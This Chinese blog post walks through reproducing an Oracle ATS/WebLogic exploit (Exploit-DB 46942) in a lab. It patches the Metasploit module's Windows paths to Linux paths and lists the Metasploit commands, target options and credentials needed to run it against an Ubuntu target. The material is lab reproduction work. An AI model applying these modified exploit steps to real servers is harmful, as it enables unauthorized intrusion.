当前位置:   article > 正文

cve N/A复现(靶机环境Ubuntu18.04)

cve N/A复现(靶机环境Ubuntu18.04)

此exp来源:https://www.exploit-db.com/exploits/46942

其实这个exp在Linux环境下也可以复现成功,只不过需要改一下从官网下载的源码;

源码第62行,可以看到最后一项是Windows系统下的路径表示方式,需要改成Linux系统下的对应路径

  1. OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS'])
  2. #用如下代码替换
  3. OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS','/root/Oracle/Middleware/user_projects/domains/'])

源码第187行,同上

  1. app_path = Rex::FileUtils.normalize_win_path(default_oats_path, 'oats\\servers\\AdminServer\\upload')
  2. #用如下代码替换
  3. app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, 'base_domain/servers/AdminServer/upload')

源码238行,同上

  1. app_path = Rex::FileUtils.normalize_win_path(default_oats_path, "oats\\servers\\AdminServer\\upload\\#{war_name}.war")
  2. #用如下代码替换
  3. app_path = Rex::FileUtils.normalize_unix_path(default_oats_path, "base_domain/servers/AdminServer/upload/#{war_name}.war")

接下来,将该脚本导入metasploit:进入脚本的父目录(这里我将脚本命名为1.rb,这里一个替换成你自己的脚本名称)

  1. sudo cp 1.rb /opt/metasploit-framework/embedded/framework/modules/exploits/
  2. sudo chmod +x /opt/metasploit-framework/embedded/framework/modules/exploits/1.rb

在终端打开metasploit,重新加载所有脚本

  1. reload_all
  2. #因为我将脚本命名为1.rb,所以metasploit导入脚本之后将其标记为1
  3. use exploits/1
  4. #可以看一下此脚本需要设置哪些参数
  5. show options
  6. #设置脚本需要的参数
  7. set RHOSTS <ip>
  8. set RPORT <port>
  9. set OATSUSERNAME <weblogic_user_name>
  10. set OATSPASSWORD <password>

对于靶机,需要安装符合要求的weblogic版本;然后关闭防火墙;在攻击机上接着上述命令攻击:

exploit

攻击效果如下:

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/菜鸟追梦旅行/article/detail/680851
推荐阅读
相关标签
  

闽ICP备14008679号